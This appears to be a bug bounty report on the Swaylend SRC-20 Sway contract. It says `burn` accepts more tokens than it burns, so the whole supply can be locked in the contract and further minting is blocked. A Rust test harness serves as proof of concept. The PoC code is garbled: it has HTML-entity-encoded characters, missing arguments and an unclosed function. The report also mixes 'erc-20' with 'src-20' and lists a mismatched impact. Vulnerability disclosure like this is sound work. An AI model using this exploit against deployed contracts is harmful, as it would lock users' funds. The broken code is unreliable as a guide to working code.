#35793 [SC-High] `src-20.burn` should use "==" instead of ">="

Submitted on Oct 8th 2024 at 14:05:18 UTC by @jasonxiale for IOP | Swaylend

  • Report ID: #35793

  • Report Type: Smart Contract

  • Report severity: High

  • Target: https://github.com/Swaylend/swaylend-monorepo/blob/develop/contracts/src-20/src/main.sw

  • Impacts:

    • Block stuffing



While burning tokens, `src-20.burn` checks msg_amount() >= amount, and updates `total_supply` as `storage.total_supply.read() - amount` in main.sw#L159-L160, and afterwards, `amount` of token will be burned in main.sw#L162

The issue is that

  1. The totalSupply is capped by 1_000_000_000_000_000_000u64, which means there will be at most 1_000_000_000_000_000_000u64 amount of token

  2. In `src-20.burn`, the `storage.total_supply` is subtracted by `amount`, and `amount` of tokens will be burnt, which means `amount` is less than `msg_amount()`, the rest of token will be left in the `src-20` contract.

And because `src-20` contract doesn't have any ABI to transfer the token out, the token will be stucked in the contract

Vulnerability Details

As shown in the following code: ```Rust 149 #[payable] 150 #[storage(read, write)] 151 fn burn(sub_id: SubId, amount: u64) { 152 require(sub_id == DEFAULT_SUB_ID, "incorrect-sub-id"); 153 require(msg_amount() >= amount, "incorrect-amount-provided"); <<<--- Here "==" should be used 154 require( 155 msg_asset_id() == AssetId::default(), 156 "incorrect-asset-provided", 157 ); 158 159 let new_supply = storage.total_supply.read() - amount; 160 storage.total_supply.write(new_supply); 161 162 burn(DEFAULT_SUB_ID, amount); 163 164 TotalSupplyEvent::new(AssetId::default(), new_supply, msg_sender().unwrap()) 165 .log(); 166 } ```

Impact Details

So please consider in a worst situation:

  1. The erc-20 owner mints `MAX_SUPPLY(1_000_000_000_000_000_000u64)` amount of token to Alice

  2. Alice calls `erc-20.burn` with `amount` as `0`, so all the token will be transferred to `erc-20` contract, and will be stucked.

  3. The erc-20 owner can't mint any token more, because the `total_supply` has reached its MAX_SUPPLY


Add any relevant links to documentation or code

Proof of Concept

Proof of Concept

Please create a folder with path `swaylend-monorepo/contracts/src-20/tests`, and add the following code into `swaylend-monorepo/contracts/src-20/tests/harness.rs`

And run ```bash cargo test burn_token -- --nocapture ... running 1 test mint wallet1 1000000000000000000 amount of token wallet_1 balance: 1000000000000000000 wallet1 burn 1000000000000000000 amount of token wallet_1 balance: 0 mint wallet1 1 amount of token test burn_token ... ok


As shown in the POC, the owner(wallet_0) first mints wallet_1 `1000000000000000000` amount of token, then wallet_1 calls `src-20.burn` with `amount` as 0, and then if the owner tries to mint 1 amount of token, the tx will revert

```Rust use fuels::{prelude::*, types::ContractId}; use fuels::types::{Address, AssetId, Bits256, Bytes32, Identity}; use sha2::{Digest, Sha256};

// Load abi from json abigen!( Contract( name = "SingleAsset", abi = "/opt/swaylend-monorepo/contracts/src-20/out/debug/src-20-abi.json" ) );

#[tokio::test] async fn burn_token() -> Result<()> { let max_supply = 1_000_000_000_000_000_000u64; let mut wallets = launch_custom_provider_and_get_wallets( WalletsConfig::new( Some(5), Some(1), Some(1_000_000_000), /* Amount per coin */ ), None, None, ) .await .unwrap(); let wallet_0 = wallets.pop().unwrap(); let wallet_1 = wallets.pop().unwrap();

let erc20_id &#x3D; Contract::load_from(
.deploy(&amp;wallet_0, TxPolicies::default())

let identity_0   &#x3D; Identity::Address(Address::from(wallet_0.address()));
let erc20_instance &#x3D; SingleAsset::new(erc20_id.clone(), wallet_0.clone());
let erc20_contract_id: ContractId &#x3D; erc20_id.into();

let sub_id &#x3D; Bytes32::from([0u8; 32]);

let identity_1 &#x3D; Identity::Address(Address::from(wallet_1.address()));

println!(&quot;mint wallet1 {} amount of token&quot;, max_supply);
erc20_instance.clone().with_account(wallet_0.clone()).methods().mint(identity_1, Some(Bits256(*sub_id)), max_supply).with_variable_output_policy(VariableOutputPolicy::Exactly(1)).call().await?;

let asset_id &#x3D; get_asset_id(sub_id, erc20_contract_id);
println!(&quot;wallet_1 balance: {}&quot;, get_wallet_balance(&amp;wallet_1, &amp;asset_id).await);

println!(&quot;wallet1 burn {} amount of token&quot;, max_supply);
let call_params &#x3D; CallParameters::new(max_supply, asset_id, 1_000_000);
erc20_instance.clone().with_account(wallet_1.clone()).methods().burn(Bits256(*sub_id), 0).with_tx_policies(TxPolicies::default().with_script_gas_limit(2_000_000)).call_params(call_params).unwrap().call().await?;

println!(&quot;wallet_1 balance: {}&quot;, get_wallet_balance(&amp;wallet_1, &amp;asset_id).await);

let one &#x3D; 1;
println!(&quot;mint wallet1 {} amount of token&quot;, one);
let burn_res &#x3D; erc20_instance.clone().with_account(wallet_0.clone()).methods().mint(identity_1, Some(Bits256(*sub_id)), one).with_variable_output_policy(VariableOutputPolicy::Exactly(1)).call().await;



pub(crate) fn get_asset_id(sub_id: Bytes32, contract: ContractId) -> AssetId { let mut hasher = Sha256::new(); hasher.update(*contract); hasher.update(*sub_id); AssetId::new(*Bytes32::from(<[u8; 32]>::from(hasher.finalize()))) } pub(crate) async fn get_wallet_balance(wallet: &WalletUnlocked, asset: &AssetId) -> u64 { wallet.get_asset_balance(asset).await.unwrap() } ```

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